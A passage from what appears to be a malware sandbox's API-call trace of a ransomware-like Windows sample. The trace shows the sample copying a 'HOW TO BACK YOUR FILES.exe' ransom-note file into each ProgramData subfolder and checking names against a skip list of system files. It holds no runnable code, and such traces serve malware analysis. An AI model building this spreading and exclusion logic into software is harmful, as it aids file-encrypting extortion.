users\\microsoft\\ehome\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.165] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.165] GetLastError () returned 0x0 [0089.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.165] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.166] CloseHandle (hObject=0x120) returned 1 [0089.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.166] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.166] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.166] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.166] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.166] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.166] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.166] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.166] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.166] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c71a2a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.166] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.166] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c71a2a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.166] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.166] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0089.166] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\DRM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM" [0089.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0089.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0089.166] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM") returned 32 [0089.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM" [0089.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.166] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\DRM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\drm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.167] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.167] GetLastError () returned 0x0 [0089.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.167] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.167] CloseHandle (hObject=0x120) returned 1 [0089.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.167] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.167] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.168] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.168] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.168] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.168] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.168] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c71a2a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.168] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.168] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="aoldtz.exe") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2=".") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="..") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="windows") returned -1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="bootmgr") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="temp") returned -1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="pagefile.sys") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="boot") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="ids.txt") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="ntuser.dat") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="perflogs") returned 1 [0089.168] lstrcmpiW (lpString1="Server", lpString2="MSBuild") returned 1 [0089.168] lstrlenW (lpString="Server") returned 6 [0089.168] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\*") returned 34 [0089.168] lstrcpyW (in: lpString1=0x2cce442, lpString2="Server" | out: lpString1="Server") returned="Server" [0089.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0089.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed8a0 [0089.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0089.168] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0 [0089.168] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.168] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0089.168] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\Server", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0089.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0089.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0089.169] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 39 [0089.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0089.169] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.169] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.169] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.169] GetLastError () returned 0x0 [0089.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.169] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.169] CloseHandle (hObject=0x120) returned 1 [0089.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.170] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.170] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.170] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.170] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.170] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.170] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c71a2a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.170] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.170] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c71a2a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.170] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.170] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.170] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\DeviceSync", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync" [0089.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed798 | out: hHeap=0x2b0000) returned 1 [0089.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.170] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 39 [0089.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync" [0089.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.171] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.171] GetLastError () returned 0x0 [0089.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.171] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.171] CloseHandle (hObject=0x120) returned 1 [0089.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.171] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.171] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.172] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.172] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.172] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.172] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.172] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c740400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.172] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.172] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c740400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.172] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.172] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0089.172] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage" [0089.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0089.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0089.172] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage") returned 41 [0089.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage" [0089.172] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.172] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.173] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.173] GetLastError () returned 0x0 [0089.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.173] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.173] CloseHandle (hObject=0x120) returned 1 [0089.173] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.173] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.173] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.173] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.173] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.173] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.173] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.173] lstrcmpiW (lpString1="..", 